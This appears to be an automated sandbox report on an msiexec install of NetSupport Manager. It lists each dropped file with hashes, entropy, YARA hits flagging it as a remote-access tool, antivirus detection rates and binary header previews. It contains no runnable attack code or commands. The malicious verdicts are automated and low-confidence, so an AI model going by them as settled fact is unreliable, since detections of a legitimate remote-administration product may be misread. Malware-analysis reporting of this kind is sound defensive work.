                                                                                      Entropy (8bit):7.972382983591089
                                                                                      Encrypted:false
                                                                                      SSDEEP:24576:JjcLsXXg/ijPaKIpt42tePKWs0u0jippHik509oh96IWIXqdgFbpcLnuTAOkvlI8:JjcLsXXg/ijPaKIpt42tePKWs0u0j8p0
                                                                                      MD5:6F293EC153DACA9796FD1E9C9C2B095E
                                                                                      SHA1:C9B280CDD81931D2CD95102FA04B96BA42F02E06
                                                                                      SHA-256:344DC9D97915EC8E4215A866F92E0BC4A50252B25534AD403105E00A750346FF
                                                                                      SHA-512:1BBCC4C4732ADEE87CA0092104741015D8AB8A9E5D21E6F805AE05BEC4A0F2889DBE12A9A28580EE5E1EE903F7FD42BC1CB750658F07D7408B60A19AA718439A
                                                                                      Malicious:false
                                                                                      Preview:ITSF....`.......3..........|.{.......".....|.{......."..`...............x.......T.......................Rc..............ITSP....T...........................................j..].!......."..T...............PMGLB................/..../#IDXHDR......../#ITBITS..../#IVB....:.../#STRINGS....O..6./#SYSTEM....D./#TOPICS.......p./#URLSTR....#..,./#URLTBL...... ./#WINDOWS....n.L./$FIftiMain....o..$./$OBJINST....T.../$WWAssociativeLinks/..../$WWAssociativeLinks/BTree......L./$WWAssociativeLinks/Data....T.V./$WWAssociativeLinks/Map....*.../$WWAssociativeLinks/Property....4 ./$WWKeywordLinks/..../$WWKeywordLinks/BTree....V..L./$WWKeywordLinks/Data...".L./$WWKeywordLinks/Map...n.z./$WWKeywordLinks/Property...h $/2fa-(two-factor-authentication.html...G.=./abort.html.....e./add_a_gateway_-_username.html...i.y)/adding_a_new_to_the_database_client.html...b.c(/adding_deleting_clients_in_a_group.html...E.s./additem.html...8.y-/adjusting_microphone_and_speaker_volume.html...1.1#/advanced_client_configura

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\nsmexec.exe

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):57824
                                                                                      Entropy (8bit):6.862108284538071
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:lF4WcduX42gXhBksgUHVEDqAnIocwl1kkr2pe/NPHDHf/ckXr2pe/eJHDHf/cky:lF4DduX4lBnzyiwYkee/VjHPee/MjHu
                                                                                      MD5:59C2F14F34522E03B127851AD682FE5A
                                                                                      SHA1:AA6204D13BEC0D33D7B3BE1043222D3367AB110F
                                                                                      SHA-256:01DF4E94F6C64CE675F3E809889E3F4FA2182B9D5411A9584F239577C3FE8F20
                                                                                      SHA-512:98949C4C649F45DD3BDDED2DCFE19D2DB45F33CE2B9E0170A8A23C74B8D5746FF17EDD33D372F491F58F13913CF9C67545144B4235C2EC168832D321EDD3AC38
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~..s:.. :.. :.. U.` 2.. U.T ... 3.m ?.. :.. ... U.U 0.. U.d ;.. U.c ;.. Rich:.. ........PE..L.....oe.................D...<...............`....@..................................]....@..................................y..<........................]...........................................x..@............`...............................text....B.......D.................. ..`.rdata..4....`... ...H..............@..@.data................h..............@....rsrc................t..............@..@.reloc..`............|..............@..B................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\nsmres.dll

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):8177120
                                                                                      Entropy (8bit):5.048395174836045
                                                                                      Encrypted:false
                                                                                      SSDEEP:98304:aU4gcDUXCYllmuLc3Klq/Uq+PujPh6415zi:argcQj9c31f+PujU415+
                                                                                      MD5:E85AF106BEDAF5E96E5633537ED29D8C
                                                                                      SHA1:CD4E38AC92374C94CCBDE982613439788EFCB7DA
                                                                                      SHA-256:3B8CCEB2A7049E2B1288E35C1469D8E2B510E844292B96F8C86108B53448C6A8
                                                                                      SHA-512:1763A02C49FF03EA3581795636DD73C5105659685112B57A1FC9D92E60A1B0748C584F1FD1F27CBBC126ED2A72CE9C2C5332EF430604C33D6DF3099BAEA6D82E
                                                                                      Malicious:true
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\nsmres.dll, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......!Kk.e*..e*..e*...\..m*...\..R*..lR..f*..e*..X*...\..n*...\..d*...\..d*..Riche*..........PE..L......e...........!.....F....|.....b........`................................|.....G.}...@..................................z..(.......T.{..........h|..]...p|......................................w..@............`...............................text....D.......F.................. ..`.rdata.......`... ...J..............@..@.data................j..............@....rsrc...T.{.......{..v..............@..@.reloc..p)...p|..*...>|.............@..B................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\nspowershell.exe

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):96736
                                                                                      Entropy (8bit):6.808355354530158
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:zMc3pwImQbF54NpbfukIEpOBfh76ORM7Cx1Iiee/bjHxR9ee/rjHJ:zMc3ppv4rbfu1cEV6ORM7CteqjteOjp
                                                                                      MD5:3C616AB2D7A5AC710E57CABCEB819CFA
                                                                                      SHA1:F447BFDB8D2C1220E73BA4E55E6752F224CFCC09
                                                                                      SHA-256:D39A4722318A7AA4782CB6837BE8989C24224B47A58AD8C639CF4C12FC97915A
                                                                                      SHA-512:B4E7C99CB41E4D7FE16B93192596E849B0E9F4749F4D1C0E7C552CE61B231BFBBD3A0B8DD8030938A069485035D0392339BEA157657BE6FCFF09B09021DBF9A5
                                                                                      Malicious:true
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\nspowershell.exe, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................z......~......x......L......M.....u......`....H......|......{....Rich...................PE..L...9.oe.....................^....................@..........................`............@.................................,........0..(................]...@..h...@...................................@............................................text............................... ..`.rdata...<.......>..................@..@.data...............................@....rsrc...(....0......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\nspscr.cat

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):9221
                                                                                      Entropy (8bit):7.232259392017478
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:K/GHRiwQnYe+PjP1rhr7+vgwKjtlAur9ZCspE+TMAr4zTh:WnYPL/rPUHeMtzN
                                                                                      MD5:E30476931A500CBB1316218170DB3FDD
                                                                                      SHA1:40E8A0BEB0E6C9B5C1037D01E921418B47828C90
                                                                                      SHA-256:3DE96F95811CF5FAF09A1909CADD7637B9B19E07FCB320AAD6EB4A187F67FE47
                                                                                      SHA-512:7E2132B5CCE530D74F2694D491733AD1B5E43E37112EB5D7587862955C7C83EAA46C128D35BDA35F382D0455F809CDA23CCBCDC6F6618DAFB9FB3DF191EBEE65
                                                                                      Malicious:false
                                                                                      Preview:0.$...*.H........#.0.#....1.0...+......0.....+.....7......0...0...+.....7.....M....><F._.G......140522094031Z0...+.....7.....0...0..}.R2.D.0.B.F.D.6.D.A.3.A.1.4.A.A.7.E.2.B.7.B.9.B.F.0.5.5.1.A.4.9.D.7.6.6.5.C.E.3.0...1..%08..+.....7...1*0(...F.i.l.e........n.s.p.s.c.r...i.n.f...0>..+.....7...100....O.S.A.t.t.r........2.:.5...1.,.2.:.5...2...0E..+.....7...17050...+.....7.......0!0...+........-..m..J....Q..ve.00b..+.....7...1T0R.L.{.D.E.3.5.1.A.4.2.-.8.E.5.9.-.1.1.D.0.-.8.C.4.7.-.0.0.C.0.4.F.C.2.9.5.E.E.}....0....RD.E.5.2.B.3.3.8.1.4.E.C.2.4.6.D.9.C.5.2.1.C.4.1.1.6.9.4.7.5.A.C.9.B.5.3.4.F.8.C...1..-08..+.....7...1*0(...F.i.l.e........n.s.p.s.c.r...s.y.s...0>..+.....7...100....O.S.A.t.t.r........2.:.5...1.,.2.:.5...2...0M..+.....7...1?0=0...+.....7...0...........0!0...+.........R.8..$m.R.A..u..SO.0b..+.....7...1T0R.L.{.C.6.8.9.A.A.B.8.-.8.E.7.8.-.1.1.D.0.-.8.C.4.7.-.0.0.C.0.4.F.C.2.9.5.E.E.}....0....RF.C.E.2.2.B.2.4.B.E.8.3.7.B.D.F.1.A.E.3.8.6.D.D.7.7.3.F.1.E.0.A.8.6.E.A.2.F.A.4...1..G0

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\nspscr.inf

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:Windows setup INFormation
                                                                                      Category:dropped
                                                                                      Size (bytes):2930
                                                                                      Entropy (8bit):5.396768235621853
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:a0xFYjOMpjOOsLGjXivDAaUntuQwuHkvFuDf+nLE7ScxbnbCNTBfoNRS2KUKFN5K:aYmtjOOsGjXivDAaUntJ3Df+LeSUEeyW
                                                                                      MD5:78B6B809D8ABCCB9FA9BF540B7CCD363
                                                                                      SHA1:2D0BFD6DA3A14AA7E2B7B9BF0551A49D7665CE30
                                                                                      SHA-256:ACFB0123F62A8A4740361F77B9D34AA6481B2AA30153F56ED866F84507D69E0C
                                                                                      SHA-512:E16A728840724FD3B8E6DF3A1B0F476D66F54F0D1A795AAB2928ECD739E1B8D6B716882D5E4F5FBCD8BB2ED7EB6B7B279198938AC7E70D130D6A0B9404FD6200
                                                                                      Malicious:false
                                                                                      Preview:; NSPSCR.INF..; Copyright (c) 2008-2014 Net Support Limited....[Version]..DriverVer=05/22/2014,12.01..CatalogFile=nspscr.cat..Signature="$Windows NT$"..Class=SmartCardReader..ClassGuid={50DD5230-BA8A-11D1-BF5D-0000F805F530}..;Class = LegacyDriver..;ClassGuid = {8ecc055d-047f-11d1-a537-0000f8753ed1}..Provider=%MFG%....[ControlFlags]..; Prevent legacy install for PnP readers..ExcludeFromSelect=Root\NS-PseudoSmartCardReader....[Manufacturer]..%MFG%=NSL, NTAMD64....; ============ Add reg for all readers ===============....[Reader.Install.AddReg]..HKLM, Software\Microsoft\Cryptography\Calais\Readers,,,..HKLM, System\CurrentControlSet\Services\SCardSvr,Start,0x00010001,2..HKLM, System\CurrentControlSet\Services\CertPropSvc,Start,0x00010001,2....; ================= NSL readers =====================....[NSL.NTAMD64]..; DisplayName Section DeviceId..; ----------- ------- --------..%MFG.DeviceDesc% = PSCR.Install, Root\NS-PseudoSmartCardReader....[PSCR.Inst

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\nspscr.sys

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):27272
                                                                                      Entropy (8bit):6.237518432862503
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:aI2iS+JdAYLZCgM11FZgx4rbnjfpe0mSoXot5RJVO8WCT74Td2aQnYPL/rKeMPPW:a9BqdtbOjpe3TXobRJVki7cTQS
                                                                                      MD5:F56457F0C75E3D9B82C88B425CB5C95B
                                                                                      SHA1:4F6BE0D0CCDAAEEC42F5F45071C6063E00AE3EE4
                                                                                      SHA-256:6DA36B43A75611476B0ABBD4F2E81FC455B694306C9500F54DD2524985FF0E1A
                                                                                      SHA-512:635B72AF34E1E6B63C7CE659DF2B9A73EB537AB9127A3ABF920188C5F3CDF571DB3942282CED0BBAD8DB28D6DDA73C6623280250B886D2DA4D43A86884DB9F41
                                                                                      Malicious:true
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\nspscr.sys, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......{/o.?N.F?N.F?N.F...F=N.F..zF=N.F?N.F N.FI.zF8N.FI.|F=N.F..lF<N.F..|F>N.FI.lF>N.F..sF7N.F..}F>N.F..yF>N.FRich?N.F........................PE..d.....}S.........."......<... ......................................................p..........................................................d............p..4....P...............@...............................................@...............................text....$.......&.................. ..h.rdata.......@.......*..............@..H.data...,....P......................@....pdata..4....p.......0..............@..HPAGEABLE.............4.............. ..`INIT....~............D.............. ....rsrc................J..............@..B.reloc..0............N..............@..B........................................................................................................................................................

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\nssres.dll

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):16632288
                                                                                      Entropy (8bit):4.729694563429236
                                                                                      Encrypted:false
                                                                                      SSDEEP:98304:Ig23l4a23kKnTtFXg+/nkeA3jiDz6Ic6MWlNkJ1uxsh7ncWHrwGra:Ck3RnTnXgcGjiilQ3mn5n1rwf
                                                                                      MD5:AC850065D5807949D987F1E00F34DFF3
                                                                                      SHA1:4E3C564046BD4F655A958F299D6DB9198FB99FF8
                                                                                      SHA-256:D0BE908B5B2149896D5F6E28C2E3D0735ABC7B200EB88C7ECFA1974618417B77
                                                                                      SHA-512:630EEA09F442EA382AC142A2BE6CE3D82E25ED88CA87873B9D6E0E4D5902C7D134486A1ECAD50089C74FFECD1E5696F080345C3EFBCEFF9C818CF653FE0ABDD5
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......!Kk.e*..e*..e*...\..m*...\..R*..lR..f*..e*..X*...\..n*...\..d*...\..d*..Riche*..........PE..L....HXf...........!.....F..."......b........`......................................U.....@..................................z..(....................l...]...p.......................................w..@............`...............................text....D.......F.................. ..`.rdata.......`... ...J..............@..@.data................j..............@....rsrc................v..............@..@.reloc..p)...p...*...B..............@..B................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicapi.dll

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):49632
                                                                                      Entropy (8bit):7.033464466519071
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:3hGznfNnu0sbqmuebcTYCBU1wn+Pam8Arr2pe/PZDRHDHf/ckWOir2pe/ssHDHfm:3hGzfFDmmTYCtMawee/njHVyee/zjHe
                                                                                      MD5:97AF6CC2109C3195ECF019C4E988079D
                                                                                      SHA1:2B1A0ED3FA7C15D77A8C08FCA4CBB503CBBFAB0F
                                                                                      SHA-256:F02F921D5C52EF1D56585AC571A42502B62F571D02E80B88C99BF74C8F390733
                                                                                      SHA-512:085D7D1F65EAF18064FEE84AD4FB1F173922F1E8C60E058274CB70D28D242A9E25415C7E204313517425A736B7A534C7D6592B8B1F1F5B312E4CCFD0471465D1
                                                                                      Malicious:true
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicapi.dll, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........~....Z...Z...Z...Z...Z...Z...Z...Z...Z...Z..Z...Z...Z...Z...Z...Z...Z...Z...Z...Z...Z...Z...ZRich...Z................PE..L...E.oe...........!.....6...........@.......P............................................@..........................c.......[..d.......x............d...]..........pQ...............................Z..@............P..X............................text....5.......6.................. ..`.rdata.......P.......:..............@..@.data....r...p.......P..............@....rsrc...x............R..............@..@.reloc...............Z..............@..B................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exe

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):120288
                                                                                      Entropy (8bit):5.251370253406986
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:o+N4gcCvlwwYBg6vJcaW3eSu+ee/WjHwlee/UjH3:z4ZEROJcaieSreHj4eljX
                                                                                      MD5:B8ACD5C9E200166C6B4E5001AEEEAF20
                                                                                      SHA1:3C37EE9757CF6AB21F4876529436E15D14DA700B
                                                                                      SHA-256:FFBD328E86899F332ED8CB4A31B93814D363034793D875B871D44EBD0C5414BC
                                                                                      SHA-512:96982BFDD8334684F832DC3F5B36288F63E5F210F4AAF14B7A630A367E5BEF8FFAB13BC1C7193BE5E2D210179598ABC654DAE5A412F844856B292A2A3199EF05
                                                                                      Malicious:true
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exe, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........O...............V"......X-..............X.......X+......X,.....Rich....................PE..L...W.oe.....................r...... ........ ....@..................................r....@.................................L ..P....0..dm...........x...]......$...0 ............................................... ..(............................text............................... ..`.rdata....... ......................@..@.rsrc...dm...0...n..................@..@.reloc...............v..............@..B........................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\pciconn.exe

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):77280
                                                                                      Entropy (8bit):6.755047083861626
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:lPSdA+F6mXkAShLY9w5VnC6ee/GjHAfee/EOjH3:ladbQUShLY9w5VnC6enj2ekjX
                                                                                      MD5:92E0CD73327A7C8B0FDAD0B26F883895
                                                                                      SHA1:9C053C38BA7AC4720EBD55C1FD1F651508170230
                                                                                      SHA-256:E1E8946A82898C48E8D61AC398D3C548CC462A555EE41C67BDDC79FFBD131741
                                                                                      SHA-512:1F1161C6FF81046B468CEB3417AF88859F6D7E39D3CAA3BED692578084929037E478A84F9C9E409BC24B4919B6309A6B2FC82B7865E2CA1C5234970E317A92F4
                                                                                      Malicious:true
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pciconn.exe, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........c....W...W...W..W...W..W...W..W...W...W..W..W...W..W...W..W...WRich...W................PE..L...W.oe.................t...X...... .............@.......................................@.....................................<........................]..........p...................................@...............@............................text...Es.......t.................. ..`.rdata.../.......0...x..............@..@.data...............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\pcictl.dll

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):24470496
                                                                                      Entropy (8bit):5.634476864287587
                                                                                      Encrypted:false
                                                                                      SSDEEP:196608:QWrPg1mPv8hXPx8Fv3Cwa/cs/Rp0se9YMg212:Q2Hv8hfeFvy3h/Rpve2rZ
                                                                                      MD5:9741168634198501D2907B3C10683D4E
                                                                                      SHA1:59153955D1DDB7EFD4B6BD9A0D24AD67938B5A14
                                                                                      SHA-256:D04A3992534AF3D8826D1F579FEDCE7477929EAC01E883063EACAA424D3F5218
                                                                                      SHA-512:1BEE509F17AB29D12FD2963A5F1EAF5592166215AA5C7BF570BFEBA1455D48DC64FC04DAEAA6F4C17FA8B0ECAF71D18DA6207E417C03713012CD27D8E9E019F5
                                                                                      Malicious:true
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcictl.dll, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......X.lH...................s..............s..7...s..................-.......P...s.....s..?...s......s..............s......Rich............................PE..L....(hf...........!.....hY..,.......T.......Y... ...........................v......8v...@..........................0i.G.....h.0....`n.`.............u..]....m..4....Y..............................Lc.@.............Y.l...L.h......................text....fY......hY................. ..`.rdata..7.....Y......lY.............@..@.data... ....@i..p...(i.............@....rsrc...`....`n.......l.............@..@.reloc...D....m..F....k.............@..@.nsld.........v.......t.............@...................................................................................................................................................................................................................................

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\pcisys.sys

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):22656
                                                                                      Entropy (8bit):6.252604525322096
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:fFZj8MgCiZetfffX3/9e0mfu2rjWevHqnYPL7NCUHeMZR:f8MXlfffX3/9e3z2evqEdR
                                                                                      MD5:84DEE0F25FE97868071202065DAB63BB
                                                                                      SHA1:64A6C2E0D4561A726BDCE5491D12693A96C45839
                                                                                      SHA-256:DE5ACE5C2A02AFB01A90BA39B305A8F3C783883012432D22912910EAD44AD60A
                                                                                      SHA-512:200A162CAD66B4EAF94B02F31FA6986028B42EA4497D234131CE3F6B8154146C00881FC75F63B077B0CCDD47A62340440884EFF2199F00D4F035622903FB8D1F
                                                                                      Malicious:true
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcisys.sys, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........w.[...[...[...[...h...-"b.X...-"d.Y...|yt.X...|yd.Z...-"t.Z...|yh.Y...|ye.Z...|ya.Z...Rich[...................PE..d.....(Y.........."......$...........a.......................................................................................................b..(....p.......P.......:..........P....1...............................................0...............................text............................... ..h.rdata.......0......................@..H.data...D....@......."..............@....pdata.......P.......(..............@..HINIT.........`.......*.............. ....rsrc........p.......4..............@..B.reloc...............8..............@..B........................................................................................................................................................................................................................

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\product.dat

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):506
                                                                                      Entropy (8bit):4.906453708261214
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:NUQi44RRN4CZCgivf2Ik2IgC0cxP/6Xrov:iJ4y4CZC/f2/2B2H6O
                                                                                      MD5:FF7C0D2DBB9195083BBABAFF482D5ED6
                                                                                      SHA1:5C2EFBF855C376CE1B93E681C54A367A407495DC
                                                                                      SHA-256:065D817596D710D5A06060241ACC207B82B844530CC56FF842FF53D8FF92A075
                                                                                      SHA-512:EA226B3A55FC59175136F104DF497EBF5055624FB1C1C8073B249DFC5E1ED5818A6FEEE995AA82CF9ED050F1ADC7A62994C90B1AF03569DFE0D4551EE2BC70C9
                                                                                      Malicious:false
                                                                                      Preview:5..0x61f7dbcb..LongName=NetSupport Manager..ShortName=NSM..Home=NSM..TLA=NSM..NSSName=NetSupport School..NSSTLA=NSS..SupportWWW=www.pci.co.uk/support|http://www.pci.co.uk/support..SupportEMail=support@pci.co.uk|mailto:support@pci.co.uk..NSMAppDataDir=NetSupport\NetSupport Manager..NSSAppDataDir=NetSupport\NetSupport School..NSSConfName=NetSupport School..AssistantName=Tutor Assistant..AssistantURL=http://www.netsupportschool.com/tutor-assistant.asp..TechConsole=1..SupportsChrome=1..SupportsAndroid=1..

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\pscrinst.dll

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):39392
                                                                                      Entropy (8bit):7.268505171847185
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:vnIX3dawZwW87doDaK8r2pe/42/HDHf/ck6r2pe/s3zHDHf/ckW/:C3dFGWTO3ee/46jHeee/sDjHC
                                                                                      MD5:53608AEEEF65674552C7A28A4F918D1F
                                                                                      SHA1:DABE4E6DC6A7CF446BA76BDA7F18AAE7B08177E4
                                                                                      SHA-256:C8B9142A399CB7171F05379E34D4D1D34659A033FD99E994BABA103E6D0D8FE3
                                                                                      SHA-512:DF58AA3E582986B80A2FA3CD395B14357ABEC7A50FA790E1723F0F9B37477476782169EC86EC259ED210C4CBC1241EF1336182AAE5C6C87994D0B00D7C16A074
                                                                                      Malicious:true
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pscrinst.dll, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........68.^WV.^WV.^WV..X..TWV.y.+.XWV.^WW.(WV.y.-.]WV.y.;.iWV.y.,._WV.y.8.QWV.y.(._WV.y..._WV.Rich^WV.........PE..L...'.}S...........!.........................@....@..........................`......Sy...............................<......L5.......................<...]...P......@...................................@...............8............................text...j-.......................... ..`.data...P....@.......2..............@....reloc.......P.......6..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\pscrinst64.dll

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):39904
                                                                                      Entropy (8bit):7.13635504885649
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:0E4XbRSshW4r2pe/6qHDHf/ckF6Nr2pe/XfJHDHf/ckbmr:uLktYee/vjHh6Jee/XRjHGr
                                                                                      MD5:834B482E183006E4CA6644CBA6F7A1A8
                                                                                      SHA1:E80B54FD273A31B6E70EA1514ABAE2B931E126D2
                                                                                      SHA-256:D0F829E161FB425667DAB3CAE56BFD3F0CC753145606A518B1C38BB5DCD4C100
                                                                                      SHA-512:3592A9540C9F5C33009E577449A426A8E1843E7F908178C911BD4410871B455485F2CE006D5BE5C2146C29252407BC9E11A6D8A583EF75CE73006444C7477E3B
                                                                                      Malicious:true
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pscrinst64.dll, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......L%...D...D...D..~...D../....D../...:D../....D...D...D../....D..~...D../....D../....D../....D../....D..Rich.D..................PE..d.....}S.........." .....0..........H.........@..............................p......................................................0?......@6...............P.......>...]...`..........................................................x............................text..../.......0.................. ..`.data........@.......4..............@....pdata.......P.......:..............@..@.reloc..b....`.......<..............@..B................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\remcmdstub.exe

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):77280
                                                                                      Entropy (8bit):6.793769574007511
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:1fafvTuNOwphKuyUHTqYXHhrXH4LLIywmoEee/MjHFee/s3jH9:1afLSpAFUzt0LLIywYeZjleRjd
                                                                                      MD5:B25AE8C65D0BAF1AD9B51DBF7E0E738A
                                                                                      SHA1:29EDDB6C96B9A58302B5FDF85919A231F448970A
                                                                                      SHA-256:340328207279A098B5C8CAFDF3A6E2DEB28C06C077D04423E084EBAD93353B83
                                                                                      SHA-512:8C22BF990978C752F6E6292CFB75B31228369E4B77D68DAA912D26302449217830E5C305446840765D3FB3F10EA575CE695A165E835570F0BC1DB44F2AB49BDA
                                                                                      Malicious:true
                                                                                      Antivirus:
